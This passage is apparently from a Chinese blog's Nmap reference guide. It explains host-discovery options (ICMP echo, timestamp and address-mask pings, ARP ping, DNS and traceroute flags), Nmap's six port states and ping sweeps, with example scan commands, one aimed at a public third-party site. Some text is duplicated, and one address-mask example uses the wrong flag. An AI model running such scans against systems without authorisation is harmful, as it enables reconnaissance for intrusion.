\u6781\u4e0d\u53ef\u80fd\u88ab\u4f7f\u7528\u7684\u7aef\u53e3\u3002\u5c11\u6570\u670d\u52a1\u5982chargen\u4f1a\u54cd\u5e94\u4e00\u4e2a\u7a7a\u7684UDP\u62a5\u6587\uff0c \u4ece\u800c\u5411Nmap\u8868\u660e\u8be5\u673a\u5668\u6b63\u5728\u8fd0\u884c\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8be5\u626b\u63cf\u7c7b\u578b\u7684\u4e3b\u8981\u4f18\u52bf\u662f\u5b83\u53ef\u4ee5\u7a7f\u8d8a\u53ea\u8fc7\u6ee4TCP\u7684\u9632\u706b\u5899\u548c\u8fc7\u6ee4\u5668\u3002 \u4f8b\u5982\u3002\u6211\u66fe\u7ecf\u6709\u8fc7\u4e00\u4e2aLinksys BEFW11S4\u65e0\u7ebf\u5bbd\u5e26\u8def\u7531\u5668\u3002\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0c \u8be5\u8bbe\u5907\u5bf9\u5916\u7684\u7f51\u5361\u8fc7\u6ee4\u6240\u6709TCP\u7aef\u53e3\uff0c\u4f46UDP\u63a2\u6d4b\u4ecd\u7136\u4f1a\u5f15\u53d1\u4e00\u4e2a\u7aef\u53e3\u4e0d\u53ef\u5230\u8fbe \u7684\u6d88\u606f\uff0c\u4ece\u800c\u66b4\u9732\u4e86\u5b83\u81ea\u5df1\u3002-PE; -PP; -PM&nbsp;(ICMP Ping Types)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u9664\u4e86\u524d\u9762\u8ba8\u8bba\u7684\u8fd9\u4e9b\u4e0d\u5e38\u89c1\u7684TCP\u548cUDP\u4e3b\u673a\u53d1\u73b0\u7c7b\u578b\uff0c Nmap\u4e5f\u80fd\u53d1\u9001\u4e16\u4eba\u7686\u77e5\u7684ping&nbsp;\u7a0b\u5e8f\u6240\u53d1\u9001\u7684\u62a5\u6587\u3002Nmap\u53d1\u9001\u4e00\u4e2aICMP type 8 (\u56de\u58f0\u8bf7\u6c42)\u62a5\u6587\u5230\u76ee\u6807IP\u5730\u5740\uff0c \u671f\u5f85\u4ece\u8fd0\u884c\u7684\u4e3b\u673a\u5f97\u5230\u4e00\u4e2atype 0 (\u56de\u58f0\u54cd\u5e94)\u62a5\u6587\u3002-PE \u9009\u9879\u7b80\u5355\u7684\u6765\u8bf4\u5c31\u662f\u5411\u76ee\u6807\u4e3b\u673a\u53d1\u9001ICMP Echo\u6570\u636e\u5305\u6765\u63a2\u6d4b\u76ee\u6807\u4e3b\u673a\u662f\u5426\u5728\u7ebf\uff0c\u4e0d\u5e78\u7684\u662f\uff0c\u8bb8\u591a\u4e3b\u673a\u548c \u9632\u706b\u5899\u73b0\u5728\u5c01\u9501\u8fd9\u4e9b\u62a5\u6587\uff0c\u800c\u4e0d\u662f\u6309\u671f\u671b\u7684\u90a3\u6837\u54cd\u5e94\uff0c \u53c2\u89c1<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.rfc-editor.org\/rfc\/rfc1122.txt\" rel=\"noreferrer noopener\" rel=\"nofollow\" >RFC 1122<\/a>\u3002\u56e0\u6b64\uff0c\u4ec5\u4ec5ICMP\u626b\u63cf\u5bf9\u4e8e\u4e92\u8054\u7f51\u4e0a\u7684\u76ee\u6807\u901a\u5e38\u662f\u4e0d\u591f\u7684\u3002 \u4f46\u5bf9\u4e8e\u7cfb\u7edf\u7ba1\u7406\u5458\u76d1\u89c6\u4e00\u4e2a\u5185\u90e8\u7f51\u7edc\uff0c\u5b83\u4eec\u53ef\u80fd\u662f\u5b9e\u9645\u6709\u6548\u7684\u9014\u5f84\u3002&nbsp;\u4f7f\u7528<code>-PE<\/code>\u9009\u9879\u6253\u5f00\u8be5\u56de\u58f0\u8bf7\u6c42\u529f\u80fd\u3002\u4f8b\u5b50\uff1anmap -PE -v 172.27.42.110<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u867d\u7136\u56de\u58f0\u8bf7\u6c42\u662f\u6807\u51c6\u7684ICMP ping\u67e5\u8be2\uff0c Nmap\u5e76\u4e0d\u6b62\u4e8e\u6b64\u3002ICMP\u6807\u51c6 (<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.rfc-editor.org\/rfc\/rfc792.txt\" rel=\"noreferrer noopener\" rel=\"nofollow\" >RFC 792<\/a>)\u8fd8\u89c4\u8303\u4e86\u65f6\u95f4\u6233\u8bf7\u6c42\uff0c\u4fe1\u606f\u8bf7\u6c42 request\uff0c\u548c\u5730\u5740\u63a9\u7801\u8bf7\u6c42\uff0c\u5b83\u4eec\u7684\u4ee3\u7801\u5206\u522b\u662f13\uff0c15\u548c17\u3002 \u867d\u7136\u8fd9\u4e9b\u67e5\u8be2\u7684\u8868\u9762\u76ee\u7684\u662f\u83b7\u53d6\u4fe1\u606f\u5982\u5730\u5740\u63a9\u7801\u548c\u5f53\u524d\u65f6\u95f4\uff0c \u5b83\u4eec\u4e5f\u53ef\u4ee5\u5f88\u5bb9\u6613\u5730\u7528\u4e8e\u4e3b\u673a\u53d1\u73b0\u3002 \u5f88\u7b80\u5355\uff0c\u56de\u5e94\u7684\u7cfb\u7edf\u5c31\u662f\u5728\u8fd0\u884c\u7684\u7cfb\u7edf\u3002Nmap\u76ee\u524d\u6ca1\u6709\u5b9e\u73b0\u4fe1\u606f\u8bf7\u6c42\u62a5\u6587\uff0c \u56e0\u4e3a\u5b83\u4eec\u8fd8\u6ca1\u6709\u88ab\u5e7f\u6cdb\u652f\u6301\u3002RFC 1122 \u575a\u6301&nbsp;\u201c\u4e3b\u673a\u4e0d\u5e94\u8be5\u5b9e\u73b0\u8fd9\u4e9b\u6d88\u606f\u201d\u3002\u65f6\u95f4\u6233\u548c\u5730\u5740\u63a9\u7801\u67e5\u8be2\u53ef\u4ee5\u5206\u522b\u7528<code>-PP<\/code>\u548c<code>-PM<\/code>\u9009\u9879\u53d1\u9001\u3002&nbsp;\u65f6\u95f4\u6233\u54cd\u5e94(ICMP\u4ee3\u780114)\u6216\u8005\u5730\u5740\u63a9\u7801\u54cd\u5e94(\u4ee3\u780118)\u8868\u793a\u4e3b\u673a\u5728\u8fd0\u884c\u3002\u5f53\u7ba1\u7406\u5458\u7279\u522b\u5c01\u9501\u4e86\u56de\u58f0\u8bf7\u6c42\u62a5\u6587\u800c\u5fd8\u4e86\u5176\u5b83ICMP\u67e5\u8be2\u53ef\u80fd\u7528\u4e8e \u76f8\u540c\u76ee\u7684\u65f6\uff0c\u8fd9\u4e24\u4e2a\u67e5\u8be2\u53ef\u80fd\u5f88\u6709\u4ef7\u503c\u3002\u4f8b\u5b50\uff1aICMP\u65f6\u95f4\u6233ping \u626b\u63cf nmap -PP -v www.baidu.com &nbsp; &nbsp; \u4f8b\u5b50\uff1aICMP \u5730\u5740\u63a9\u7801ping\u626b\u63cf nmap -PE -v 172.27.42.110 &nbsp;<strong>\u4e0d\u540c\u7684\u626b\u63cf\u65b9\u5f0f\u7a7f\u900f\u4e0d\u540c\u7684\u9632\u706b\u5899\u6709\u4e0d\u540c\u7684\u6548\u679c<\/strong>-PR &nbsp;(ARP Ping)<\/p>\n\n\n<p class=\"wp-block-paragraph\">-PR \u901a\u5e38\u5728\u626b\u63cf\u5c40\u57df\u7f51\u65f6\u4f7f\u7528\u3002\u6700\u5e38\u89c1\u7684Nmap\u4f7f\u7528\u573a\u666f\u4e4b\u4e00\u662f\u626b\u63cf\u4e00\u4e2a\u4ee5\u592a\u5c40\u57df\u7f51\u3002 \u5728\u5927\u90e8\u5206\u5c40\u57df\u7f51\u4e0a\uff0c\u7279\u522b\u662f\u90a3\u4e9b\u4f7f\u7528\u57fa\u4e8e RFC1918\u79c1\u6709\u5730\u5740\u8303\u56f4\u7684\u7f51\u7edc\uff0c\u5728\u4e00\u4e2a\u7ed9\u5b9a\u7684\u65f6\u95f4\u7edd\u5927\u90e8\u5206 IP\u5730\u5740\u90fd\u662f\u4e0d\u4f7f\u7528\u7684\u3002 \u5f53Nmap\u8bd5\u56fe\u53d1\u9001\u4e00\u4e2a\u539f\u59cbIP\u62a5\u6587\u5982ICMP\u56de\u58f0\u8bf7\u6c42\u65f6\uff0c \u64cd\u4f5c\u7cfb\u7edf\u5fc5\u987b\u786e\u5b9a\u5bf9\u5e94\u4e8e\u76ee\u6807IP\u7684\u786c\u4ef6 \u5730\u5740(ARP)\uff0c\u8fd9\u6837\u5b83\u624d\u80fd\u628a\u4ee5\u592a\u5e27\u9001\u5f80\u6b63\u786e\u7684\u5730\u5740\u3002 \u8fd9\u4e00\u822c\u6bd4\u8f83\u6162\u800c\u4e14\u4f1a\u6709\u4e9b\u95ee\u9898\uff0c\u56e0\u4e3a\u64cd\u4f5c\u7cfb\u7edf\u8bbe\u8ba1\u8005\u8ba4\u4e3a\u4e00\u822c\u4e0d\u4f1a\u5728\u77ed\u65f6\u95f4\u5185 \u5bf9\u6ca1\u6709\u8fd0\u884c\u7684\u673a\u5668\u4f5c\u51e0\u767e\u4e07\u6b21\u7684ARP\u8bf7\u6c42\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5f53\u8fdb\u884cARP\u626b\u63cf\u65f6\uff0cNmap\u7528\u5b83\u4f18\u5316\u7684\u7b97\u6cd5\u7ba1\u7406ARP\u8bf7\u6c42\u3002 \u5f53\u5b83\u6536\u5230\u54cd\u5e94\u65f6\uff0c Nmap\u751a\u81f3\u4e0d\u9700\u8981\u62c5\u5fc3\u57fa\u4e8eIP\u7684ping\u62a5\u6587\uff0c\u65e2\u7136\u5b83\u5df2\u7ecf\u77e5\u9053\u8be5\u4e3b\u673a\u6b63\u5728\u8fd0\u884c\u4e86\u3002 \u8fd9\u4f7f\u5f97ARP\u626b\u63cf\u6bd4\u57fa\u4e8eIP\u7684\u626b\u63cf\u66f4\u5feb\u66f4\u53ef\u9760\u3002 \u6240\u4ee5\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0c\u5982\u679cNmap\u53d1\u73b0\u76ee\u6807\u4e3b\u673a\u5c31\u5728\u5b83\u6240\u5728\u7684\u5c40\u57df\u7f51\u4e0a\uff0c\u5b83\u4f1a\u8fdb\u884cARP\u626b\u63cf\u3002 \u5373\u4f7f\u6307\u5b9a\u4e86\u4e0d\u540c\u7684ping\u7c7b\u578b(\u5982&nbsp;<code>-PI<\/code>\u6216\u8005&nbsp;<code>-PS<\/code>) \uff0cNmap\u4e5f\u4f1a\u5bf9\u4efb\u4f55\u76f8\u540c\u5c40\u57df\u7f51\u4e0a\u7684\u76ee\u6807\u673a\u4f7f\u7528ARP\u3002 \u5982\u679c\u60a8\u771f\u7684\u4e0d\u60f3\u8981ARP\u626b\u63cf\uff0c\u6307\u5b9a&nbsp;<code>--send-ip<\/code>\u3002-n &nbsp;(\u4e0d\u8fdb\u884c\u53cd\u5411\u57df\u540d\u89e3\u6790)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u544a\u8bc9Nmap \u6c38\u4e0d\u5bf9\u5b83\u53d1\u73b0\u7684\u6d3b\u52a8IP\u5730\u5740\u8fdb\u884c\u53cd\u5411\u57df\u540d\u89e3\u6790\u3002&nbsp;<strong>\u65e2\u7136DNS\u4e00\u822c\u6bd4\u8f83\u6162\uff0c\u8fd9\u53ef\u4ee5\u8ba9\u4e8b\u60c5\u66f4\u5feb\u4e9b\u3002<\/strong><code>-R<\/code>&nbsp;(\u4e3a\u6240\u6709\u76ee\u6807ip \u8fdb\u884c \u57df\u540d\u89e3\u6790)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u544a\u8bc9Nmap&nbsp;<em>\u6c38\u8fdc<\/em>&nbsp;\u5bf9\u76ee\u6807IP\u5730\u5740\u4f5c\u53cd\u5411\u57df\u540d\u89e3\u6790\u3002 \u4e00\u822c\u53ea\u6709\u5f53\u53d1\u73b0\u673a\u5668\u6b63\u5728\u8fd0\u884c\u65f6\u624d\u8fdb\u884c\u8fd9\u9879\u64cd\u4f5c\u3002<code>--system-dns<\/code>&nbsp;(\u4f7f\u7528\u7cfb\u7edf\u57df\u540d\u89e3\u6790\u5668)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0cNmap\u901a\u8fc7\u76f4\u63a5\u53d1\u9001\u67e5\u8be2\u5230\u60a8\u7684\u4e3b\u673a\u4e0a\u914d\u7f6e\u7684\u57df\u540d\u670d\u52a1\u5668 \u6765\u89e3\u6790\u57df\u540d\u3002\u4e3a\u4e86\u63d0\u9ad8\u6027\u80fd\uff0c\u8bb8\u591a\u8bf7\u6c42 (\u4e00\u822c\u51e0\u5341\u4e2a ) \u5e76\u53d1\u6267\u884c\u3002\u5982\u679c\u60a8\u5e0c\u671b\u4f7f\u7528\u7cfb\u7edf\u81ea\u5e26\u7684\u89e3\u6790\u5668\uff0c\u5c31\u6307\u5b9a\u8be5\u9009\u9879 (\u901a\u8fc7getnameinfo()\u8c03\u7528\u4e00\u6b21\u89e3\u6790\u4e00\u4e2aIP)\u3002\u9664\u975eNmap\u7684DNS\u4ee3\u7801\u6709bug--\u5982\u679c\u662f\u8fd9\u6837\uff0c\u8bf7\u8054\u7cfb\u6211\u4eec\u3002 \u4e00\u822c\u4e0d\u4f7f\u7528\u8be5\u9009\u9879\uff0c\u56e0\u4e3a\u5b83\u6162\u591a\u4e86\u3002\u7cfb\u7edf\u89e3\u6790\u5668\u603b\u662f\u7528\u4e8eIPv6\u626b\u63cf\u3002--traceroute<\/p>\n\n\n<p class=\"wp-block-paragraph\">--traceroute \u9009\u9879\u53ef\u4ee5\u8fdb\u884c\u8def\u7531\u8ddf\u8e2a\uff0c\u5e2e\u52a9\u4e86\u89e3\u7f51\u7edc\uff0c\u53ef\u4ee5\u67e5\u770b\u4ece\u672c\u5730\u8ba1\u7b97\u673a\u5230\u76ee\u6807\u4e4b\u95f4\u6240\u7ecf\u8fc7\u7684\u7f51\u7edc\u8282\u70b9\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5b50\uff1anmap --traceroute -v 172.27.42.110<code>--system-dns<\/code>&nbsp;(\u4f7f\u7528\u7cfb\u7edf\u57df\u540d\u89e3\u6790\u5668)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0cNmap\u901a\u8fc7\u76f4\u63a5\u53d1\u9001\u67e5\u8be2\u5230\u60a8\u7684\u4e3b\u673a\u4e0a\u914d\u7f6e\u7684\u57df\u540d\u670d\u52a1\u5668 \u6765\u89e3\u6790\u57df\u540d\u3002\u4e3a\u4e86\u63d0\u9ad8\u6027\u80fd\uff0c\u8bb8\u591a\u8bf7\u6c42 (\u4e00\u822c\u51e0\u5341\u4e2a ) \u5e76\u53d1\u6267\u884c\u3002\u5982\u679c\u60a8\u5e0c\u671b\u4f7f\u7528\u7cfb\u7edf\u81ea\u5e26\u7684\u89e3\u6790\u5668\uff0c\u5c31\u6307\u5b9a\u8be5\u9009\u9879 (\u901a\u8fc7getnameinfo()\u8c03\u7528\u4e00\u6b21\u89e3\u6790\u4e00\u4e2aIP)\u3002\u9664\u975eNmap\u7684DNS\u4ee3\u7801\u6709bug--\u5982\u679c\u662f\u8fd9\u6837\uff0c\u8bf7\u8054\u7cfb\u6211\u4eec\u3002 \u4e00\u822c\u4e0d\u4f7f\u7528\u8be5\u9009\u9879\uff0c\u56e0\u4e3a\u5b83\u6162\u591a\u4e86\u3002\u7cfb\u7edf\u89e3\u6790\u5668\u603b\u662f\u7528\u4e8eIPv6\u626b\u63cf\u3002<\/p>\n\n\n<h1 class=\"wp-block-heading\">\u7aef\u53e3\u626b\u63cf\u57fa\u7840<\/h1>\n\n\n<p class=\"wp-block-paragraph\">\u867d\u7136Nmap\u8fd9\u4e9b\u5e74\u6765\u529f\u80fd\u8d8a\u6765\u8d8a\u591a\uff0c \u5b83\u4e5f\u662f\u4ece\u4e00\u4e2a\u9ad8\u6548\u7684\u7aef\u53e3\u626b\u63cf\u5668\u5f00\u59cb\u7684\uff0c\u5e76\u4e14\u90a3\u4ecd\u7136\u662f\u5b83\u7684\u6838\u5fc3\u529f\u80fd\u3002&nbsp;<strong>nmap&nbsp;<em><code>&lt;target&gt;<\/code><\/em><\/strong>\u8fd9\u4e2a\u7b80\u5355\u7684\u547d\u4ee4\u626b\u63cf\u4e3b\u673a<em><code>&lt;target&gt;<\/code><\/em>\u4e0a\u7684\u8d85\u8fc7 1660\u4e2aTCP\u7aef\u53e3\u3002 \u3002\u8bb8\u591a\u4f20\u7edf\u7684\u7aef\u53e3\u626b\u63cf\u5668\u53ea\u5217\u51fa\u6240\u6709\u7aef\u53e3\u662f\u5f00\u653e\u8fd8\u662f\u5173\u95ed\u7684\uff0c Nmap\u7684\u4fe1\u606f\u7c92\u5ea6\u6bd4\u5b83\u4eec\u8981\u7ec6\u5f97\u591a\u3002&nbsp;\u5b83\u628a\u7aef\u53e3\u5206\u6210\u516d\u4e2a\u72b6\u6001:&nbsp;<code>open<\/code>(\u5f00\u653e\u7684)\uff0c&nbsp;<code>closed<\/code>(\u5173\u95ed\u7684)\uff0c<code>filtered<\/code>(\u88ab\u8fc7\u6ee4\u7684)\uff0c&nbsp;<code>unfiltered<\/code>(\u672a\u88ab\u8fc7\u6ee4\u7684)\uff0c&nbsp;<code>open|filtered(\u5f00\u653e\u6216\u8005\u88ab\u8fc7\u6ee4\u7684)<\/code>\uff0c\u6216\u8005&nbsp;<code>closed|filtered(\u5173\u95ed\u6216\u8005\u88ab\u8fc7\u6ee4\u7684)<\/code>\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e9b\u72b6\u6001\u5e76\u975e\u7aef\u53e3\u672c\u8eab\u7684\u6027\u8d28\uff0c\u800c\u662f\u63cf\u8ff0Nmap\u600e\u6837\u770b\u5f85\u5b83\u4eec\u3002\u4f8b\u5982\uff0c \u5bf9\u4e8e\u540c\u6837\u7684\u76ee\u6807\u673a\u5668\u7684135\/tcp\u7aef\u53e3\uff0c\u4ece\u540c\u7f51\u7edc\u626b\u63cf\u663e\u793a\u5b83\u662f\u5f00\u653e\u7684\uff0c\u800c\u8de8\u7f51\u7edc\u4f5c\u5b8c\u5168\u76f8\u540c\u7684\u626b\u63cf\u5219\u53ef\u80fd\u663e\u793a\u5b83\u662f&nbsp;<code>filtered<\/code>(\u88ab\u8fc7\u6ee4\u7684)\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\"><strong>Nmap\u6240\u8bc6\u522b\u76846\u4e2a\u7aef\u53e3\u72b6\u6001\u3002<\/strong><strong>open<\/strong>(\u5f00\u653e\u7684)<\/p>\n\n\n<pre class=\"wp-block-code\"><code>\u5e94\u7528\u7a0b\u5e8f\u6b63\u5728\u8be5\u7aef\u53e3\u63a5\u6536TCP \u8fde\u63a5\u6216\u8005UDP\u62a5\u6587\u3002\u53d1\u73b0\u8fd9\u4e00\u70b9\u5e38\u5e38\u662f\u7aef\u53e3\u626b\u63cf \u7684\u4e3b\u8981\u76ee\u6807\u3002\u5b89\u5168\u610f\u8bc6\u5f3a\u7684\u4eba\u4eec\u77e5\u9053\u6bcf\u4e2a\u5f00\u653e\u7684\u7aef\u53e3 \u90fd\u662f\u653b\u51fb\u7684\u5165\u53e3\u3002\u653b\u51fb\u8005\u6216\u8005\u5165\u4fb5\u6d4b\u8bd5\u8005\u60f3\u8981\u53d1\u73b0\u5f00\u653e\u7684\u7aef\u53e3\u3002 \u800c\u7ba1\u7406\u5458\u5219\u8bd5\u56fe\u5173\u95ed\u5b83\u4eec\u6216\u8005\u7528\u9632\u706b\u5899\u4fdd\u62a4\u5b83\u4eec\u4ee5\u514d\u59a8\u788d\u4e86\u5408\u6cd5\u7528\u6237\u3002 \u975e\u5b89\u5168\u626b\u63cf\u53ef\u80fd\u5bf9\u5f00\u653e\u7684\u7aef\u53e3\u4e5f\u611f\u5174\u8da3\uff0c\u56e0\u4e3a\u5b83\u4eec\u663e\u793a\u4e86\u7f51\u7edc\u4e0a\u90a3\u4e9b\u670d\u52a1\u53ef\u4f9b\u4f7f\u7528\u3002<\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\"><strong>closed<\/strong>(\u5173\u95ed\u7684)<\/p>\n\n\n<pre class=\"wp-block-code\"><code>\u5173\u95ed\u7684\u7aef\u53e3\u5bf9\u4e8eNmap\u4e5f\u662f\u53ef\u8bbf\u95ee\u7684(\u5b83\u63a5\u53d7Nmap\u7684\u63a2\u6d4b\u62a5\u6587\u5e76\u4f5c\u51fa\u54cd\u5e94)\uff0c \u4f46\u6ca1\u6709\u5e94\u7528\u7a0b\u5e8f\u5728\u5176\u4e0a\u76d1\u542c\u3002 \u5b83\u4eec\u53ef\u4ee5\u663e\u793a\u8be5IP\u5730\u5740\u4e0a(\u4e3b\u673a\u53d1\u73b0\uff0c\u6216\u8005ping\u626b\u63cf)\u7684\u4e3b\u673a\u6b63\u5728\u8fd0\u884cup \u4e5f\u5bf9\u90e8\u5206\u64cd\u4f5c\u7cfb\u7edf\u63a2\u6d4b\u6709\u6240\u5e2e\u52a9\u3002 \u56e0\u4e3a\u5173\u95ed\u7684\u5173\u53e3\u662f\u53ef\u8bbf\u95ee\u7684\uff0c\u4e5f\u8bb8\u8fc7\u4f1a\u513f\u503c\u5f97\u518d\u626b\u63cf\u4e00\u4e0b\uff0c\u53ef\u80fd\u4e00\u4e9b\u53c8\u5f00\u653e\u4e86\u3002 \u7cfb\u7edf\u7ba1\u7406\u5458\u53ef\u80fd\u4f1a\u8003\u8651\u7528\u9632\u706b\u5899\u5c01\u9501\u8fd9\u6837\u7684\u7aef\u53e3\u3002 \u90a3\u6837\u4ed6\u4eec\u5c31\u4f1a\u88ab\u663e\u793a\u4e3a\u88ab\u8fc7\u6ee4\u7684\u72b6\u6001\uff0c\u4e0b\u9762\u8ba8\u8bba\u3002<\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\"><strong>filtered<\/strong>(\u88ab\u8fc7\u6ee4\u7684)<\/p>\n\n\n<pre class=\"wp-block-code\"><code>\u7531\u4e8e\u5305\u8fc7\u6ee4\u963b\u6b62\u63a2\u6d4b\u62a5\u6587\u5230\u8fbe\u7aef\u53e3\uff0c Nmap\u65e0\u6cd5\u786e\u5b9a\u8be5\u7aef\u53e3\u662f\u5426\u5f00\u653e\u3002\u8fc7\u6ee4\u53ef\u80fd\u6765\u81ea\u4e13\u4e1a\u7684\u9632\u706b\u5899\u8bbe\u5907\uff0c\u8def\u7531\u5668\u89c4\u5219 \u6216\u8005\u4e3b\u673a\u4e0a\u7684\u8f6f\u4ef6\u9632\u706b\u5899\u3002\u8fd9\u6837\u7684\u7aef\u53e3\u8ba9\u653b\u51fb\u8005\u611f\u89c9\u5f88\u632b\u6298\uff0c\u56e0\u4e3a\u5b83\u4eec\u51e0\u4e4e\u4e0d\u63d0\u4f9b \u4efb\u4f55\u4fe1\u606f\u3002\u6709\u65f6\u5019\u5b83\u4eec\u54cd\u5e94ICMP\u9519\u8bef\u6d88\u606f\u5982\u7c7b\u578b3\u4ee3\u780113 (\u65e0\u6cd5\u5230\u8fbe\u76ee\u6807: \u901a\u4fe1\u88ab\u7ba1\u7406\u5458\u7981\u6b62)\uff0c\u4f46\u66f4\u666e\u904d\u7684\u662f\u8fc7\u6ee4\u5668\u53ea\u662f\u4e22\u5f03\u63a2\u6d4b\u5e27\uff0c \u4e0d\u505a\u4efb\u4f55\u54cd\u5e94\u3002 \u8fd9\u8feb\u4f7fNmap\u91cd\u8bd5\u82e5\u5e72\u6b21\u4ee5\u8bbf\u4e07\u4e00\u63a2\u6d4b\u5305\u662f\u7531\u4e8e\u7f51\u7edc\u963b\u585e\u4e22\u5f03\u7684\u3002 \u8fd9\u4f7f\u5f97\u626b\u63cf\u901f\u5ea6\u660e\u663e\u53d8\u6162\u3002<\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\"><strong>unfiltered<\/strong>(\u672a\u88ab\u8fc7\u6ee4\u7684)<\/p>\n\n\n<pre class=\"wp-block-code\"><code>\u672a\u88ab\u8fc7\u6ee4\u72b6\u6001\u610f\u5473\u7740\u7aef\u53e3\u53ef\u8bbf\u95ee\uff0c\u4f46Nmap\u4e0d\u80fd\u786e\u5b9a\u5b83\u662f\u5f00\u653e\u8fd8\u662f\u5173\u95ed\u3002 \u53ea\u6709\u7528\u4e8e\u6620\u5c04\u9632\u706b\u5899\u89c4\u5219\u96c6\u7684ACK\u626b\u63cf\u624d\u4f1a\u628a\u7aef\u53e3\u5206\u7c7b\u5230\u8fd9\u79cd\u72b6\u6001\u3002 \u7528\u5176\u5b83\u7c7b\u578b\u7684\u626b\u63cf\u5982\u7a97\u53e3\u626b\u63cf\uff0cSYN\u626b\u63cf\uff0c\u6216\u8005FIN\u626b\u63cf\u6765\u626b\u63cf\u672a\u88ab\u8fc7\u6ee4\u7684\u7aef\u53e3\u53ef\u4ee5\u5e2e\u52a9\u786e\u5b9a \u7aef\u53e3\u662f\u5426\u5f00\u653e\u3002<\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\"><strong>open|filtered<\/strong>(\u5f00\u653e\u6216\u8005\u88ab\u8fc7\u6ee4\u7684)<\/p>\n\n\n<pre class=\"wp-block-code\"><code>\u5f53\u65e0\u6cd5\u786e\u5b9a\u7aef\u53e3\u662f\u5f00\u653e\u8fd8\u662f\u88ab\u8fc7\u6ee4\u7684\uff0cNmap\u5c31\u628a\u8be5\u7aef\u53e3\u5212\u5206\u6210 \u8fd9\u79cd\u72b6\u6001\u3002\u5f00\u653e\u7684\u7aef\u53e3\u4e0d\u54cd\u5e94\u5c31\u662f\u4e00\u4e2a\u4f8b\u5b50\u3002\u6ca1\u6709\u54cd\u5e94\u4e5f\u53ef\u80fd\u610f\u5473\u7740\u62a5\u6587\u8fc7\u6ee4\u5668\u4e22\u5f03 \u4e86\u63a2\u6d4b\u62a5\u6587\u6216\u8005\u5b83\u5f15\u53d1\u7684\u4efb\u4f55\u54cd\u5e94\u3002\u56e0\u6b64Nmap\u65e0\u6cd5\u786e\u5b9a\u8be5\u7aef\u53e3\u662f\u5f00\u653e\u7684\u8fd8\u662f\u88ab\u8fc7\u6ee4\u7684\u3002 UDP\uff0cIP\u534f\u8bae\uff0c FIN\uff0cNull\uff0c\u548cXmas\u626b\u63cf\u53ef\u80fd\u628a\u7aef\u53e3\u5f52\u5165\u6b64\u7c7b\u3002<\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\"><strong>closed|filtered<\/strong>(\u5173\u95ed\u6216\u8005\u88ab\u8fc7\u6ee4\u7684)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8be5\u72b6\u6001\u7528\u4e8eNmap\u4e0d\u80fd\u786e\u5b9a\u7aef\u53e3\u662f\u5173\u95ed\u7684\u8fd8\u662f\u88ab\u8fc7\u6ee4\u7684\u3002 \u5b83\u53ea\u53ef\u80fd\u51fa\u73b0\u5728IPID Idle\u626b\u63cf\u4e2d\u3002<\/p>\n\n\n<figure class=\"wp-block-embed\"><div class=\"wp-block-embed__wrapper\">\nhttp:\/\/www.cnblogs.com\/st-leslie\/p\/5115280.html\n<\/div><\/figure>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/img-blog.csdn.net\/20170413191828266?watermark\/2\/text\/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvZnJlZWtpbmcxMDE=\/font\/5a6L5L2T\/fontsize\/400\/fill\/I0JBQkFCMA==\/dissolve\/70\/gravity\/Center\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe4\" alt=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe4\" \/><\/figure>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/img-blog.csdn.net\/20180104233208808?watermark\/2\/text\/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvZnJlZWtpbmcxMDE=\/font\/5a6L5L2T\/fontsize\/400\/fill\/I0JBQkFCMA==\/dissolve\/70\/gravity\/SouthEast\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe5\" alt=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe5\" \/><\/figure>\n\n\n<h2 class=\"wp-block-heading\">Ping\u626b\u63cf\uff08Ping Sweeping\uff09<\/h2>\n\n\n<p class=\"wp-block-paragraph\"><strong>nmap -sP 192.168.7.0\/24 &nbsp; \/\/\u7b49\u4ef7\u4e8e -sP \u53c2\u6570\u3002\u90fd\u662fping \u626b\u63cf\u3002nmap&nbsp;-sn 192.168.7.0\/24<\/strong><\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5165\u4fb5\u8005\u4f7f\u7528Nmap\u626b\u63cf\u6574\u4e2a\u7f51\u7edc\u5bfb\u627e\u76ee\u6807\u3002\u901a\u8fc7\u4f7f\u7528&quot; -sP&quot;\u547d\u4ee4\uff0c\u8fdb\u884cping\u626b\u63cf\u3002\u7f3a\u7701\u60c5\u51b5\u4e0b\uff0cNmap\u7ed9\u6bcf\u4e2a\u626b\u63cf\u5230\u7684\u4e3b\u673a\u53d1\u9001\u4e00\u4e2aICMP echo\u548c\u4e00\u4e2aTCP ACK, 